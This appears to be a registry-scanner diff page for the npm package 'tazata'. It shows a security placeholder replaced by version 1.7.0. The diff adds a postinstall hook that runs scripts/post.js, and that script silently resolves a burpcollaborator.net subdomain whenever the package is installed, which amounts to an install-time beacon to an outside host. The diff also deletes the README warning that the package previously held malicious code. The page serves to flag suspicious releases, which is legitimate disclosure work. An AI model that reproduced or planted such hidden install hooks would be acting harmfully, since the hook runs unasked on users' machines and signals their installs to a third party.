tazata 0.0.1-security → 1.7.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of tazata might be problematic. Click here for more details.

package/README.md.txt ADDED
File without changes
package/mod.js ADDED
@@ -0,0 +1,4 @@
1
+ exports.printMsg = function() {
2
+ console.log("Hello World!");
3
+ return "Hello World!";
4
+ }
package/package.json CHANGED
@@ -1,6 +1,23 @@
1
1
  {
2
2
  "name": "tazata",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.7.0",
4
+ "description": "This is the test mod",
5
+ "main": "mod.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "postinstall": "node ./scripts/post.js"
9
+ },
10
+ "author": "Zar",
11
+ "license": "ISC",
12
+ "repository": {
13
+ "type": "git",
14
+ "url": "git+https://github.com/zarvisd/motichoor.git"
15
+ },
16
+ "keywords": [
17
+ "motichoor"
18
+ ],
19
+ "bugs": {
20
+ "url": "https://github.com/zarvisd/motichoor/issues"
21
+ },
22
+ "homepage": "https://github.com/zarvisd/motichoor#readme"
6
23
  }
@@ -0,0 +1,6 @@
1
+ var dns = require("dns");
2
+
3
+ dns.resolve("hj4j29aw7ste5mg7c6dj19klnct2hr.burpcollaborator.net",(err,addresses,family) => {
4
+ console.log("addresses");
5
+ return;
6
+ })
package/tt.js ADDED
@@ -0,0 +1,3 @@
1
+ var s = require("tazata");
2
+
3
+ s.printMsg();
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=tazata for more information.